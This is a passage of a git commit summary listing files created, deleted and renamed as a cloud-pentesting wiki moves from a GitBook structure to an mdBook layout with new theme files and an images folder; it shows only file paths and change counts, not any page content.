theme/fonts/OPEN-SANS-LICENSE.txt | 202 +++ theme/fonts/SOURCE-CODE-PRO-LICENSE.txt | 93 ++ theme/fonts/fonts.css | 100 ++ .../open-sans-v17-all-charsets-300.woff2 | Bin 0 -> 44352 bytes ...open-sans-v17-all-charsets-300italic.woff2 | Bin 0 -> 40656 bytes .../open-sans-v17-all-charsets-600.woff2 | Bin 0 -> 44936 bytes ...open-sans-v17-all-charsets-600italic.woff2 | Bin 0 -> 42120 bytes .../open-sans-v17-all-charsets-700.woff2 | Bin 0 -> 44988 bytes ...open-sans-v17-all-charsets-700italic.woff2 | Bin 0 -> 40800 bytes .../open-sans-v17-all-charsets-800.woff2 | Bin 0 -> 44536 bytes ...open-sans-v17-all-charsets-800italic.woff2 | Bin 0 -> 40812 bytes .../open-sans-v17-all-charsets-italic.woff2 | Bin 0 -> 41076 bytes .../open-sans-v17-all-charsets-regular.woff2 | Bin 0 -> 43236 bytes ...source-code-pro-v11-all-charsets-500.woff2 | Bin 0 -> 59140 bytes theme/highlight.css | 84 ++ theme/highlight.js | 54 + theme/ht_searcher.js | 486 ++++++++ theme/index.hbs | 392 ++++++ theme/pagetoc.css | 189 +++ theme/pagetoc.js | 68 ++ theme/sponsor.js | 58 + theme/tabs.css | 41 + theme/tabs.js | 75 ++ theme/toc.js.hbs | 73 ++ 1373 files changed, 26143 insertions(+), 34152 deletions(-) delete mode 100644 .gitbook/assets/empty.zip delete mode 100644 README.md delete mode 100644 SUMMARY.md create mode 100644 book.toml create mode 100644 hacktricks-preprocessor.py delete mode 100644 pentesting-ci-cd/apache-airflow-security/airflow-configuration.md delete mode 100644 pentesting-ci-cd/cloudflare-security/README.md delete mode 100644 pentesting-ci-cd/cloudflare-security/cloudflare-domains.md delete mode 100644 pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md delete mode 100644 pentesting-ci-cd/concourse-security/README.md delete mode 100644 pentesting-ci-cd/concourse-security/concourse-architecture.md delete mode 100644 pentesting-ci-cd/gitea-security/basic-gitea-information.md delete mode 100644 pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md delete mode 100644 pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md delete mode 100644 pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md delete mode 100644 pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md delete mode 100644 pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md delete mode 100644 pentesting-ci-cd/todo.md delete mode 100644 pentesting-ci-cd/travisci-security/README.md delete mode 100644 pentesting-ci-cd/vercel-security.md delete mode 100644 pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/README.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md delete mode 100644 pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md delete mode 100644 pentesting-cloud/aws-security/aws-services/README.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-eks-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-elasticache.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-emr-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-kms-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-mq-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-route53-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-sns-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/aws-sts-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md delete mode 100644 pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md delete mode 100644 pentesting-cloud/azure-security/az-device-registration.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md delete mode 100644 pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md delete mode 100644 pentesting-cloud/azure-security/az-permissions-for-a-pentest.md delete mode 100644 pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md delete mode 100644 pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md delete mode 100644 pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md delete mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md delete mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md delete mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md delete mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md delete mode 100644 pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md delete mode 100644 pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md delete mode 100644 pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md delete mode 100644 pentesting-cloud/azure-security/az-services/README.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-acr.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-application-proxy.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-arm-templates.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-queue-enum.md delete mode 100644 pentesting-cloud/azure-security/az-services/az-table-storage.md delete mode 100644 pentesting-cloud/azure-security/az-services/intune.md delete mode 100644 pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md delete mode 100644 pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md delete mode 100644 pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/README.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/README.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md delete mode 100644 pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md delete mode 100644 pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md delete mode 100644 pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md delete mode 100644 pentesting-cloud/ibm-cloud-pentesting/README.md delete mode 100644 pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md delete mode 100644 pentesting-cloud/kubernetes-security/README.md delete mode 100644 pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md delete mode 100644 pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md delete mode 100644 pentesting-cloud/openshift-pentesting/README.md delete mode 100644 pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md delete mode 100644 pentesting-cloud/workspace-security/README.md delete mode 100644 pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md delete mode 100644 pentesting-cloud/workspace-security/gws-persistence.md delete mode 100644 pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md create mode 100644 src/README.md create mode 100644 src/SUMMARY.md create mode 100644 src/banners/hacktricks-training.md rename {.gitbook/assets => src/images}/05-constraints.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_02_47-.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_11_28-Window.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_11_43-Window.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_28_26-Window.png (100%) rename {.gitbook/assets => src/images}/2023-03-06 17_28_50-Window.png (100%) rename {.gitbook/assets => src/images}/CLOUD-logo-letters.svg (100%) create mode 100644 src/images/CLOUD-web-logo.png create mode 100644 src/images/HT-TRAINING-web-logo.png rename {.gitbook/assets => src/images}/Imagen13.png (100%) rename {.gitbook/assets => src/images}/Imagen14.png (100%) rename {.gitbook/assets => src/images}/Kyverno.png (100%) rename {.gitbook/assets => src/images}/Managing SCCs in OpenShift-1.png (100%) rename {.gitbook/assets => src/images}/Openshift-RunLevel4.png (100%) create mode 100644 src/images/arte.png rename {.gitbook/assets => src/images}/cloud gif.gif (100%) rename {.gitbook/assets => src/images}/cloud.gif (100%) create mode 100644 src/images/grte.png rename {.gitbook/assets => src/images}/hc (1) (1).png (100%) rename {.gitbook/assets => src/images}/hc (1).png (100%) rename {.gitbook/assets => src/images}/hc (2) (1).png (100%) rename {.gitbook/assets => src/images}/hc (2).png (100%) rename {.gitbook/assets => src/images}/hc (3).png (100%) rename {.gitbook/assets => src/images}/hc (4).png (100%) rename {.gitbook/assets => src/images}/hc.jpeg (100%) rename {.gitbook/assets => src/images}/hc.png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => src/images}/image (1) (1) (1) (1) (1) (1) (1).png (100%) rename {.gitbook/assets => 